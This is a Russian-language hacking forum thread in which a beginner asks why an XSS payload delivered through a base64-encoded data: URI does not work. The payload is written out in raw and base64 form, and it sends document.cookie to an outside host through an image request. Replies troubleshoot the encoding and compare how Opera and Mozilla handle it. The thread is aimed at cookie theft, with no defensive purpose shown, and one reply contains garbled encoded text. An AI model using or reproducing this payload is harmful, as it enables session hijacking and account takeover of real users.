Всем привет я тут начал изучать метод хсс через протокала дата и у меня чёт не получилось взял <script>img = new Image();img.src= "http://сайт.com/1/s.gif?"+document.cookie;</script> прекодировал PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTtpbWcuc3JjPSAiaHR0cDovL9GB0LDQudGCLmNvbS8xL3MuZ2lmPyIrZG9jdW1lbnQuY29va2llOzwvc2NyaXB0Pg== перешол по ссылке data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTtpbWcuc3JjPSAiaHR0cDovL9GB0LDQudGCLmNvbS8xL3MuZ2lmPyIrZG9jdW1lbnQuY29va2llOzwvc2NyaXB0Pg== в ответ полный ноль, почему?(сайт изменино)
Возможно у тебя не та кодировка: Code: <script>img = new Image();img.src= "http://б�аАаЙб�.com/1/s.gif?"+document.cookie;</script> А так всё у меня работает.
о, всё заработало, просто кодировщик учитывал пробел после ;</script> который я не заметил, наверно из-за етого и не работало
тут маленький вопрос появился, у меня в опере код теперь не работает, а в мозиле пашет, это что получается, в опере дыру прикрыли?
да да если .php то надо чем то другим пробовать шифровать если .html другим я методом тыка пробовал бывает что в index.php html кода вообще нет то тогда через eval здесь по ходи по этой теме /threadnav144505-1-10.html
та не, думаю ето тут не при чём, вот захожу например сюда / в мозиле вбиваю код и куки записываются, если в опере то записывается только пробел
Просто когда в браузере прикрыта XSS, это навряд-ли можно назвать "Дырой"... Браузер все навсего выполняет скрипты